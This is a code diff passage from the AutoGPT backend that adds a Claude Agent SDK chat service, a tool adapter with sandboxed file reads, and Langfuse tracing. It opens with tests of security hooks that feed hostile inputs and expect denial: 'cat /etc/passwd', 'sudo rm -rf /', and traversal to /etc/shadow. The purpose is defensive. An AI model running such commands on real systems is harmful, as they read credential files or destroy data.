+    result = _validate_tool_access(
+        "Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_path_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Bash",
+        {"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
+        sdk_cwd=SDK_CWD,
+    )
+    assert result == {}
+
+
+def test_bash_empty_command_denied():
+    result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
+    assert _is_denied(result)
+
+
+# -- Dangerous patterns ------------------------------------------------------
+
+
+def test_dangerous_pattern_blocked():
+    result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
+    assert _is_denied(result)
+
+
+def test_subprocess_pattern_blocked():
+    result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
+    assert _is_denied(result)
+
+
+# -- User isolation ----------------------------------------------------------
+
+
+def test_workspace_path_traversal_blocked():
+    result = _validate_user_isolation(
+        "workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
+    )
+    assert _is_denied(result)
+
+
+def test_workspace_absolute_path_blocked():
+    result = _validate_user_isolation(
+        "workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
+    )
+    assert _is_denied(result)
+
+
+def test_workspace_normal_path_allowed():
+    result = _validate_user_isolation(
+        "workspace_read", {"path": "src/main.py"}, user_id="user-1"
+    )
+    assert result == {}
+
+
+def test_non_workspace_tool_passes_isolation():
+    result = _validate_user_isolation(
+        "find_agent", {"query": "email"}, user_id="user-1"
+    )
+    assert result == {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
@@ -0,0 +1,556 @@
+"""Claude Agent SDK service layer for CoPilot chat completions."""
+
+import asyncio
+import json
+import logging
+import os
+import re
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any
+
+from backend.util.exceptions import NotFoundError
+
+from ..config import ChatConfig
+from ..model import (
+    ChatMessage,
+    ChatSession,
+    Usage,
+    get_chat_session,
+    update_session_title,
+    upsert_chat_session,
+)
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamStart,
+    StreamTextDelta,
+    StreamToolInputAvailable,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from ..service import _build_system_prompt, _generate_session_title
+from ..tracking import track_user_message
+from .anthropic_fallback import stream_with_anthropic
+from .response_adapter import SDKResponseAdapter
+from .security_hooks import create_security_hooks
+from .tool_adapter import (
+    COPILOT_TOOL_NAMES,
+    create_copilot_mcp_server,
+    set_execution_context,
+)
+from .tracing import TracedSession, create_tracing_hooks, merge_hooks
+
+logger = logging.getLogger(__name__)
+config = ChatConfig()
+
+# Set to hold background tasks to prevent garbage collection
+_background_tasks: set[asyncio.Task[Any]] = set()
+
+
+_SDK_CWD_PREFIX = "/tmp/copilot-"
+
+# Appended to the system prompt to inform the agent about Bash restrictions.
+# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
+# but it doesn't know about our security hooks' command allowlist for Bash.
+_SDK_TOOL_SUPPLEMENT = """
+
+## Bash restrictions
+
+The Bash tool is restricted to safe, read-only data-processing commands:
+jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
+echo, diff, base64, and similar utilities.
+Network commands (curl, wget), destructive commands (rm, chmod), and
+interpreters (python, node) are NOT available.
+"""
+
+
+def _resolve_sdk_model() -> str | None:
+    """Resolve the model name for the Claude Agent SDK CLI.
+
+    Uses ``config.claude_agent_model`` if set, otherwise derives from
+    ``config.model`` by stripping the OpenRouter provider prefix (e.g.,
+    ``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``).
+    """
+    if config.claude_agent_model:
+        return config.claude_agent_model
+    model = config.model
+    if "/" in model:
+        return model.split("/", 1)[1]
+    return model
+
+
+def _build_sdk_env() -> dict[str, str]:
+    """Build env vars for the SDK CLI process.
+
+    Routes API calls through OpenRouter (or a custom base_url) using
+    the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
+    This gives per-call token and cost tracking on the OpenRouter dashboard.
+
+    Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
+    token are both present — otherwise returns an empty dict so the SDK
+    falls back to its default credentials.
+    """
+    env: dict[str, str] = {}
+    if config.api_key and config.base_url:
+        # Strip /v1 suffix — SDK expects the base URL without a version path
+        base = config.base_url.rstrip("/")
+        if base.endswith("/v1"):
+            base = base[:-3]
+        if not base or not base.startswith("http"):
+            # Invalid base_url — don't override SDK defaults
+            return env
+        env["ANTHROPIC_BASE_URL"] = base
+        env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
+        # Must be explicitly empty so the CLI uses AUTH_TOKEN instead
+        env["ANTHROPIC_API_KEY"] = ""
+    return env
+
+
+def _make_sdk_cwd(session_id: str) -> str:
+    """Create a safe, session-specific working directory path.
+
+    Sanitizes session_id, then validates the resulting path stays under /tmp/
+    using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
+    """
+    # Step 1: Sanitize - only allow alphanumeric and hyphens
+    safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
+    if not safe_id:
+        raise ValueError("Session ID is empty after sanitization")
+
+    # Step 2: Construct path with known-safe prefix
+    cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
+
+    # Step 3: Validate the path is still under our prefix (prevent traversal)
+    if not cwd.startswith(_SDK_CWD_PREFIX):
+        raise ValueError(f"Session path escaped prefix: {cwd}")
+
+    # Step 4: Additional assertion for defense-in-depth
+    assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
+
+    return cwd
+
+
+def _cleanup_sdk_tool_results(cwd: str) -> None:
+    """Remove SDK tool-result files for a specific session working directory.
+
+    The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
+    We clean only the specific cwd's results to avoid race conditions between
+    concurrent sessions.
+
+    Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
+    """
+    import shutil
+
+    # Security check 1: Validate cwd is under the expected prefix
+    normalized = os.path.normpath(cwd)
+    if not normalized.startswith(_SDK_CWD_PREFIX):
+        logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
+        return
+
+    # Security check 2: Ensure no path traversal in the normalized path
+    if ".." in normalized:
+        logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
+        return
+
+    # SDK encodes the cwd path by replacing '/' with '-'
+    encoded_cwd = normalized.replace("/", "-")
+
+    # Construct the project directory path (known-safe home expansion)
+    claude_projects = os.path.expanduser("~/.claude/projects")
+    project_dir = os.path.join(claude_projects, encoded_cwd)
+
+    # Security check 3: Validate project_dir is under ~/.claude/projects
+    project_dir = os.path.normpath(project_dir)
+    if not project_dir.startswith(claude_projects):
+        logger.warning(
+            f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
+        )
+        return
+
+    results_dir = os.path.join(project_dir, "tool-results")
+    if os.path.isdir(results_dir):
+        for filename in os.listdir(results_dir):
+            file_path = os.path.join(results_dir, filename)
+            try:
+                if os.path.isfile(file_path):
+                    os.remove(file_path)
+            except OSError:
+                pass
+
+    # Also clean up the temp cwd directory itself
+    try:
+        shutil.rmtree(normalized, ignore_errors=True)
+    except OSError:
+        pass
+
+
+async def _compress_conversation_history(
+    session: ChatSession,
+) -> list[ChatMessage]:
+    """Compress prior conversation messages if they exceed the token threshold.
+
+    Uses the shared compress_context() from prompt.py which supports:
+    - LLM summarization of old messages (keeps recent ones intact)
+    - Progressive content truncation as fallback
+    - Middle-out deletion as last resort
+
+    Returns the compressed prior messages (everything except the current message).
+    """
+    prior = session.messages[:-1]
+    if len(prior) < 2:
+        return prior
+
+    from backend.util.prompt import compress_context
+
+    # Convert ChatMessages to dicts for compress_context
+    messages_dict = []
+    for msg in prior:
+        msg_dict: dict[str, Any] = {"role": msg.role}
+        if msg.content:
+            msg_dict["content"] = msg.content
+        if msg.tool_calls:
+            msg_dict["tool_calls"] = msg.tool_calls
+        if msg.tool_call_id:
+            msg_dict["tool_call_id"] = msg.tool_call_id
+        messages_dict.append(msg_dict)
+
+    try:
+        import openai
+
+        async with openai.AsyncOpenAI(
+            api_key=config.api_key, base_url=config.base_url, timeout=30.0
+        ) as client:
+            result = await compress_context(
+                messages=messages_dict,
+                model=config.model,
+                client=client,
+            )
+    except Exception as e:
+        logger.warning(f"[SDK] Context compression with LLM failed: {e}")
+        # Fall back to truncation-only (no LLM summarization)
+        result = await compress_context(
+            messages=messages_dict,
+            model=config.model,
+            client=None,
+        )
+
+    if result.was_compacted:
+        logger.info(
+            f"[SDK] Context compacted: {result.original_token_count} -> "
+            f"{result.token_count} tokens "
+            f"({result.messages_summarized} summarized, "
+            f"{result.messages_dropped} dropped)"
+        )
+        # Convert compressed dicts back to ChatMessages
+        return [
+            ChatMessage(
+                role=m["role"],
+                content=m.get("content"),
+                tool_calls=m.get("tool_calls"),
+                tool_call_id=m.get("tool_call_id"),
+            )
+            for m in result.messages
+        ]
+
+    return prior
+
+
+def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
+    """Format conversation messages into a context prefix for the user message.
+
+    Returns a string like:
+        <conversation_history>
+        User: hello
+        You responded: Hi! How can I help?
+        </conversation_history>
+
+    Returns None if there are no messages to format.
+    """
+    if not messages:
+        return None
+
+    lines: list[str] = []
+    for msg in messages:
+        if not msg.content:
+            continue
+        if msg.role == "user":
+            lines.append(f"User: {msg.content}")
+        elif msg.role == "assistant":
+            lines.append(f"You responded: {msg.content}")
+        # Skip tool messages — they're internal details
+
+    if not lines:
+        return None
+
+    return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
+
+
+async def stream_chat_completion_sdk(
+    session_id: str,
+    message: str | None = None,
+    tool_call_response: str | None = None,  # noqa: ARG001
+    is_user_message: bool = True,
+    user_id: str | None = None,
+    retry_count: int = 0,  # noqa: ARG001
+    session: ChatSession | None = None,
+    context: dict[str, str] | None = None,  # noqa: ARG001
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream chat completion using Claude Agent SDK.
+
+    Drop-in replacement for stream_chat_completion with improved reliability.
+    """
+
+    if session is None:
+        session = await get_chat_session(session_id, user_id)
+
+    if not session:
+        raise NotFoundError(
+            f"Session {session_id} not found. Please create a new session first."
+        )
+
+    if message:
+        session.messages.append(
+            ChatMessage(
+                role="user" if is_user_message else "assistant", content=message
+            )
+        )
+        if is_user_message:
+            track_user_message(
+                user_id=user_id, session_id=session_id, message_length=len(message)
+            )
+
+    session = await upsert_chat_session(session)
+
+    # Generate title for new sessions (first user message)
+    if is_user_message and not session.title:
+        user_messages = [m for m in session.messages if m.role == "user"]
+        if len(user_messages) == 1:
+            first_message = user_messages[0].content or message or ""
+            if first_message:
+                task = asyncio.create_task(
+                    _update_title_async(session_id, first_message, user_id)
+                )
+                _background_tasks.add(task)
+                task.add_done_callback(_background_tasks.discard)
+
+    # Build system prompt (reuses non-SDK path with Langfuse support)
+    has_history = len(session.messages) > 1
+    system_prompt, _ = await _build_system_prompt(
+        user_id, has_conversation_history=has_history
+    )
+    system_prompt += _SDK_TOOL_SUPPLEMENT
+    message_id = str(uuid.uuid4())
+    text_block_id = str(uuid.uuid4())
+    task_id = str(uuid.uuid4())
+
+    yield StreamStart(messageId=message_id, taskId=task_id)
+
+    stream_completed = False
+    # Use a session-specific temp dir to avoid cleanup race conditions
+    # between concurrent sessions.
+    sdk_cwd = _make_sdk_cwd(session_id)
+    os.makedirs(sdk_cwd, exist_ok=True)
+
+    set_execution_context(user_id, session, None)
+
+    try:
+        try:
+            from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
+
+            mcp_server = create_copilot_mcp_server()
+
+            sdk_model = _resolve_sdk_model()
+
+            # Initialize Langfuse tracing (no-op if not configured)
+            tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
+
+            # Merge security hooks with optional tracing hooks
+            security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
+            tracing_hooks = create_tracing_hooks(tracer)
+            combined_hooks = merge_hooks(security_hooks, tracing_hooks)
+
+            options = ClaudeAgentOptions(
+                system_prompt=system_prompt,
+                mcp_servers={"copilot": mcp_server},  # type: ignore[arg-type]
+                allowed_tools=COPILOT_TOOL_NAMES,
+                hooks=combined_hooks,  # type: ignore[arg-type]
+                cwd=sdk_cwd,
+                max_buffer_size=config.claude_agent_max_buffer_size,
+                model=sdk_model,
+                env=_build_sdk_env(),
+                user=user_id or None,
+                max_budget_usd=config.claude_agent_max_budget_usd,
+            )
+
+            adapter = SDKResponseAdapter(message_id=message_id)
+            adapter.set_task_id(task_id)
+
+            async with tracer, ClaudeSDKClient(options=options) as client:
+                current_message = message or ""
+                if not current_message and session.messages:
+                    last_user = [m for m in session.messages if m.role == "user"]
+                    if last_user:
+                        current_message = last_user[-1].content or ""
+
+                if not current_message.strip():
+                    yield StreamError(
+                        errorText="Message cannot be empty.",
+                        code="empty_prompt",
+                    )
+                    yield StreamFinish()
+                    return
+
+                # Build query with conversation history context.
+                # Compress history first to handle long conversations.
+                query_message = current_message
+                if len(session.messages) > 1:
+                    compressed = await _compress_conversation_history(session)
+                    history_context = _format_conversation_context(compressed)
+                    if history_context:
+                        query_message = (
+                            f"{history_context}\n\n"
+                            f"Now, the user says:\n{current_message}"
+                        )
+
+                logger.info(
+                    f"[SDK] Sending query: {current_message[:80]!r}"
+                    f" ({len(session.messages)} msgs in session)"
+                )
+                tracer.log_user_message(current_message)
+                await client.query(query_message, session_id=session_id)
+
+                assistant_response = ChatMessage(role="assistant", content="")
+                accumulated_tool_calls: list[dict[str, Any]] = []
+                has_appended_assistant = False
+                has_tool_results = False
+
+                async for sdk_msg in client.receive_messages():
+                    logger.debug(
+                        f"[SDK] Received: {type(sdk_msg).__name__} "
+                        f"{getattr(sdk_msg, 'subtype', '')}"
+                    )
+                    tracer.log_sdk_message(sdk_msg)
+                    for response in adapter.convert_message(sdk_msg):
+                        if isinstance(response, StreamStart):
+                            continue
+                        yield response
+
+                        if isinstance(response, StreamTextDelta):
+                            delta = response.delta or ""
+                            # After tool results, start a new assistant
+                            # message for the post-tool text.
+                            if has_tool_results and has_appended_assistant:
+                                assistant_response = ChatMessage(
+                                    role="assistant", content=delta
+                                )
+                                accumulated_tool_calls = []
+                                has_appended_assistant = False
+                                has_tool_results = False
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+                            else:
+                                assistant_response.content = (
+                                    assistant_response.content or ""
+                                ) + delta
+                                if not has_appended_assistant:
+                                    session.messages.append(assistant_response)
+                                    has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolInputAvailable):
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": response.toolCallId,
+                                    "type": "function",
+                                    "function": {
+                                        "name": response.toolName,
+                                        "arguments": json.dumps(response.input or {}),
+                                    },
+                                }
+                            )
+                            assistant_response.tool_calls = accumulated_tool_calls
+                            if not has_appended_assistant:
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolOutputAvailable):
+                            session.messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=(
+                                        response.output
+                                        if isinstance(response.output, str)
+                                        else str(response.output)
+                                    ),
+                                    tool_call_id=response.toolCallId,
+                                )
+                            )
+                            has_tool_results = True
+
+                        elif isinstance(response, StreamUsage):
+                            session.usage.append(
+                                Usage(
+                                    prompt_tokens=response.promptTokens,
+                                    completion_tokens=response.completionTokens,
+                                    total_tokens=response.totalTokens,
+                                )
+                            )
+
+                        elif isinstance(response, StreamFinish):
+                            stream_completed = True
+
+                    if stream_completed:
+                        break
+
+                if (
+                    assistant_response.content or assistant_response.tool_calls
+                ) and not has_appended_assistant:
+                    session.messages.append(assistant_response)
+
+        except ImportError:
+            logger.warning(
+                "[SDK] claude-agent-sdk not available, using Anthropic fallback"
+            )
+            async for response in stream_with_anthropic(
+                session, system_prompt, text_block_id
+            ):
+                if isinstance(response, StreamFinish):
+                    stream_completed = True
+                yield response
+
+        await upsert_chat_session(session)
+        logger.debug(
+            f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
+        )
+        if not stream_completed:
+            yield StreamFinish()
+
+    except Exception as e:
+        logger.error(f"[SDK] Error: {e}", exc_info=True)
+        try:
+            await upsert_chat_session(session)
+        except Exception as save_err:
+            logger.error(f"[SDK] Failed to save session on error: {save_err}")
+        yield StreamError(
+            errorText="An error occurred. Please try again.",
+            code="sdk_error",
+        )
+        yield StreamFinish()
+    finally:
+        _cleanup_sdk_tool_results(sdk_cwd)
+
+
+async def _update_title_async(
+    session_id: str, message: str, user_id: str | None = None
+) -> None:
+    """Background task to update session title."""
+    try:
+        title = await _generate_session_title(
+            message, user_id=user_id, session_id=session_id
+        )
+        if title:
+            await update_session_title(session_id, title)
+            logger.debug(f"[SDK] Generated title for {session_id}: {title}")
+    except Exception as e:
+        logger.warning(f"[SDK] Failed to update session title: {e}")
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
@@ -0,0 +1,321 @@
+"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
+
+This module provides the adapter layer that converts existing BaseTool implementations
+into in-process MCP tools that can be used with the Claude Agent SDK.
+"""
+
+import json
+import logging
+import os
+import uuid
+from contextvars import ContextVar
+from typing import Any
+
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools import TOOL_REGISTRY
+from backend.api.features.chat.tools.base import BaseTool
+
+logger = logging.getLogger(__name__)
+
+# Allowed base directory for the Read tool (SDK saves oversized tool results here)
+_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
+
+# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
+MCP_SERVER_NAME = "copilot"
+MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
+
+# Context variables to pass user/session info to tool execution
+_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
+_current_session: ContextVar[ChatSession | None] = ContextVar(
+    "current_session", default=None
+)
+_current_tool_call_id: ContextVar[str | None] = ContextVar(
+    "current_tool_call_id", default=None
+)
+
+# Stash for MCP tool outputs before the SDK potentially truncates them.
+# Keyed by tool_name → full output string. Consumed (popped) by the
+# response adapter when it builds StreamToolOutputAvailable.
+_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
+    "pending_tool_outputs", default=None  # type: ignore[arg-type]
+)
+
+
+def set_execution_context(
+    user_id: str | None,
+    session: ChatSession,
+    tool_call_id: str | None = None,
+) -> None:
+    """Set the execution context for tool calls.
+
+    This must be called before streaming begins to ensure tools have access
+    to user_id and session information.
+    """
+    _current_user_id.set(user_id)
+    _current_session.set(session)
+    _current_tool_call_id.set(tool_call_id)
+    _pending_tool_outputs.set({})
+
+
+def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
+    """Get the current execution context."""
+    return (
+        _current_user_id.get(),
+        _current_session.get(),
+        _current_tool_call_id.get(),
+    )
+
+
+def pop_pending_tool_output(tool_name: str) -> str | None:
+    """Pop and return the stashed full output for *tool_name*.
+
+    The SDK CLI may truncate large tool results (writing them to disk and
+    replacing the content with a file reference). This stash keeps the
+    original MCP output so the response adapter can forward it to the
+    frontend for proper widget rendering.
+
+    Returns ``None`` if nothing was stashed for *tool_name*.
+    """
+    pending = _pending_tool_outputs.get(None)
+    if pending is None:
+        return None
+    return pending.pop(tool_name, None)
+
+
+def create_tool_handler(base_tool: BaseTool):
+    """Create an async handler function for a BaseTool.
+
+    This wraps the existing BaseTool._execute method to be compatible
+    with the Claude Agent SDK MCP tool format.
+    """
+
+    async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
+        """Execute the wrapped tool and return MCP-formatted response."""
+        user_id, session, tool_call_id = get_execution_context()
+
+        if session is None:
+            return {
+                "content": [
+                    {
+                        "type": "text",
+                        "text": json.dumps(
+                            {
+                                "error": "No session context available",
+                                "type": "error",
+                            }
+                        ),
+                    }
+                ],
+                "isError": True,
+            }
+
+        try:
+            # Call the existing tool's execute method
+            # Generate unique tool_call_id per invocation for proper correlation
+            effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
+            result = await base_tool.execute(
+                user_id=user_id,
+                session=session,
+                tool_call_id=effective_id,
+                **args,
+            )
+
+            # The result is a StreamToolOutputAvailable, extract the output
+            text = (
+                result.output
+                if isinstance(result.output, str)
+                else json.dumps(result.output)
+            )
+
+            # Stash the full output before the SDK potentially truncates it.
+            # The response adapter will pop this for frontend widget rendering.
+            pending = _pending_tool_outputs.get(None)
+            if pending is not None:
+                pending[base_tool.name] = text
+
+            return {
+                "content": [{"type": "text", "text": text}],
+                "isError": not result.success,
+            }
+
+        except Exception as e:
+            logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
+            return {
+                "content": [
+                    {
+                        "type": "text",
+                        "text": json.dumps(
+                            {
+                                "error": str(e),
+                                "type": "error",
+                                "message": f"Failed to execute {base_tool.name}",
+                            }
+                        ),
+                    }
+                ],
+                "isError": True,
+            }
+
+    return tool_handler
+
+
+def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
+    """Build a JSON Schema input schema for a tool."""
+    return {
+        "type": "object",
+        "properties": base_tool.parameters.get("properties", {}),
+        "required": base_tool.parameters.get("required", []),
+    }
+
+
+def get_tool_definitions() -> list[dict[str, Any]]:
+    """Get all tool definitions in MCP format.
+
+    Returns a list of tool definitions that can be used with
+    create_sdk_mcp_server or as raw tool definitions.
+    """
+    tool_definitions = []
+
+    for tool_name, base_tool in TOOL_REGISTRY.items():
+        tool_def = {
+            "name": tool_name,
+            "description": base_tool.description,
+            "inputSchema": _build_input_schema(base_tool),
+        }
+        tool_definitions.append(tool_def)
+
+    return tool_definitions
+
+
+def get_tool_handlers() -> dict[str, Any]:
+    """Get all tool handlers mapped by name.
+
+    Returns a dictionary mapping tool names to their handler functions.
+    """
+    handlers = {}
+
+    for tool_name, base_tool in TOOL_REGISTRY.items():
+        handlers[tool_name] = create_tool_handler(base_tool)
+
+    return handlers
+
+
+async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
+    """Read a file with optional offset/limit. Restricted to SDK working directory.
+
+    After reading, the file is deleted to prevent accumulation in long-running pods.
+    """
+    file_path = args.get("file_path", "")
+    offset = args.get("offset", 0)
+    limit = args.get("limit", 2000)
+
+    # Security: only allow reads under the SDK's working directory
+    real_path = os.path.realpath(file_path)
+    if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
+        return {
+            "content": [{"type": "text", "text": f"Access denied: {file_path}"}],
+            "isError": True,
+        }
+
+    try:
+        with open(real_path) as f:
+            lines = f.readlines()
+        selected = lines[offset : offset + limit]
+        content = "".join(selected)
+        return {"content": [{"type": "text", "text": content}], "isError": False}
+    except FileNotFoundError:
+        return {
+            "content": [{"type": "text", "text": f"File not found: {file_path}"}],
+            "isError": True,
+        }
+    except Exception as e:
+        return {
+            "content": [{"type": "text", "text": f"Error reading file: {e}"}],
+            "isError": True,
+        }
+
+
+_READ_TOOL_NAME = "Read"
+_READ_TOOL_DESCRIPTION = (
+    "Read a file from the local filesystem. "
+    "Use offset and limit to read specific line ranges for large files."
+)
+_READ_TOOL_SCHEMA = {
+    "type": "object",
+    "properties": {
+        "file_path": {
+            "type": "string",
+            "description": "The absolute path to the file to read",
+        },
+        "offset": {
+            "type": "integer",
+            "description": "Line number to start reading from (0-indexed). Default: 0",
+        },
+        "limit": {
+            "type": "integer",
+            "description": "Number of lines to read. Default: 2000",
+        },
+    },
+    "required": ["file_path"],
+}
+
+
+# Create the MCP server configuration
+def create_copilot_mcp_server():
+    """Create an in-process MCP server configuration for CoPilot tools.
+
+    This can be passed to ClaudeAgentOptions.mcp_servers.
+
+    Note: The actual SDK MCP server creation depends on the claude-agent-sdk
+    package being available. This function returns the configuration that
+    can be used with the SDK.
+    """
+    try:
+        from claude_agent_sdk import create_sdk_mcp_server, tool
+
+        # Create decorated tool functions
+        sdk_tools = []
+
+        for tool_name, base_tool in TOOL_REGISTRY.items():
+            handler = create_tool_handler(base_tool)
+            decorated = tool(
+                tool_name,
+                base_tool.description,
+                _build_input_schema(base_tool),
+            )(handler)
+            sdk_tools.append(decorated)
+
+        # Add the Read tool so the SDK can read back oversized tool results
+        read_tool = tool(
+            _READ_TOOL_NAME,
+            _READ_TOOL_DESCRIPTION,
+            _READ_TOOL_SCHEMA,
+        )(_read_file_handler)
+        sdk_tools.append(read_tool)
+
+        server = create_sdk_mcp_server(
+            name=MCP_SERVER_NAME,
+            version="1.0.0",
+            tools=sdk_tools,
+        )
+
+        return server
+
+    except ImportError:
+        # Let ImportError propagate so service.py handles the fallback
+        raise
+
+
+# SDK built-in tools allowed within the workspace directory.
+# Security hooks validate that file paths stay within sdk_cwd
+# and that Bash commands are restricted to a safe allowlist.
+_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
+
+# List of tool names for allowed_tools configuration
+# Include MCP tools, the MCP Read tool for oversized results,
+# and SDK built-in file tools for workspace operations.
+COPILOT_TOOL_NAMES = [
+    *[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
+    f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
+    *_SDK_BUILTIN_TOOLS,
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
@@ -0,0 +1,429 @@
+"""Langfuse tracing integration for Claude Agent SDK.
+
+This module provides modular, non-invasive observability for SDK sessions.
+All tracing is opt-in (only active when Langfuse credentials are configured)
+and designed to not affect the core execution flow.
+
+Usage:
+    async with TracedSession(session_id, user_id) as tracer:
+        # Your SDK code here
+        tracer.log_user_message(message)
+        async for sdk_msg in client.receive_messages():
+            tracer.log_sdk_message(sdk_msg)
+        tracer.log_result(result_message)
+"""
+
+from __future__ import annotations
+
+import logging
+import time
+from contextlib import asynccontextmanager
+from dataclasses import dataclass, field
+from typing import TYPE_CHECKING, Any
+
+from backend.util.settings import Settings
+
+if TYPE_CHECKING:
+    from claude_agent_sdk import Message, ResultMessage
+
+logger = logging.getLogger(__name__)
+settings = Settings()
+
+
+def _is_langfuse_configured() -> bool:
+    """Check if Langfuse credentials are configured."""
+    return bool(
+        settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
+    )
+
+
+@dataclass
+class ToolSpan:
+    """Tracks a single tool call for tracing."""
+
+    tool_call_id: str
+    tool_name: str
+    input: dict[str, Any]
+    start_time: float = field(default_factory=time.perf_counter)
+    output: str | None = None
+    success: bool = True
+    end_time: float | None = None
+
+
+@dataclass
+class GenerationSpan:
+    """Tracks an LLM generation (text output) for tracing."""
+
+    text: str = ""
+    start_time: float = field(default_factory=time.perf_counter)
+    end_time: float | None = None
+    tool_calls: list[ToolSpan] = field(default_factory=list)
+
+
+class TracedSession:
+    """Context manager for tracing a Claude Agent SDK session with Langfuse.
+
+    Automatically creates a trace with:
+    - Session-level metadata (user_id, session_id)
+    - Generation spans for LLM outputs
+    - Tool call spans with input/output
+    - Token usage and cost (from ResultMessage)
+
+    If Langfuse is not configured, all methods are no-ops.
+    """
+
+    def __init__(
+        self,
+        session_id: str,
+        user_id: str | None = None,
+        system_prompt: str | None = None,
+        model: str | None = None,
+    ):
+        self.session_id = session_id
+        self.user_id = user_id
+        self.system_prompt = system_prompt
+        self.model = model
+        self.enabled = _is_langfuse_configured()
+
+        # Internal state
+        self._trace: Any = None
+        self._langfuse: Any = None
+        self._user_message: str | None = None
+        self._generations: list[GenerationSpan] = []
+        self._current_generation: GenerationSpan | None = None
+        self._pending_tools: dict[str, ToolSpan] = {}
+        self._start_time: float = 0
+
+    async def __aenter__(self) -> TracedSession:
+        """Start the trace."""
+        if not self.enabled:
+            return self
+
+        try:
+            from langfuse import get_client
+
+            self._langfuse = get_client()
+            self._start_time = time.perf_counter()
+
+            # Create the root trace
+            self._trace = self._langfuse.trace(
+                name="copilot-sdk-session",
+                session_id=self.session_id,
+                user_id=self.user_id,
+                metadata={
+                    "sdk": "claude-agent-sdk",
+                    "has_system_prompt": bool(self.system_prompt),
+                },
+            )
+            logger.debug(f"[Tracing] Started trace for session {self.session_id}")
+
+        except Exception as e:
+            logger.warning(f"[Tracing] Failed to start trace: {e}")
+            self.enabled = False
+
+        return self
+
+    async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
+        """End the trace and flush to Langfuse."""
+        if not self.enabled or not self._trace:
+            return
+
+        try:
+            # Finalize any open generation
+            self._finalize_current_generation()
+
+            # Add generations as spans
+            for gen in self._generations:
+                self._trace.span(
+                    name="llm-generation",
+                    start_time=gen.start_time,
+                    end_time=gen.end_time or time.perf_counter(),
+                    output=gen.text[:1000] if gen.text else None,  # Truncate
+                    metadata={"tool_calls": len(gen.tool_calls)},
+                )
+
+                # Add tool calls as nested spans
+                for tool in gen.tool_calls:
+                    self._trace.span(
+                        name=f"tool:{tool.tool_name}",
+                        start_time=tool.start_time,
+                        end_time=tool.end_time or time.perf_counter(),
+                        input=tool.input,
+                        output=tool.output[:500] if tool.output else None,
+                        metadata={
+                            "tool_call_id": tool.tool_call_id,
+                            "success": tool.success,
+                        },
+                    )
+
+            # Update trace with final status
+            status = "error" if exc_type else "success"
+            self._trace.update(
+                output=self._generations[-1].text[:500] if self._generations else None,
+                metadata={"status": status, "num_generations": len(self._generations)},
+            )
+
+            # Flush asynchronously (Langfuse handles this in background)
+            logger.debug(
+                f"[Tracing] Completed trace for session {self.session_id}, "
+                f"{len(self._generations)} generations"
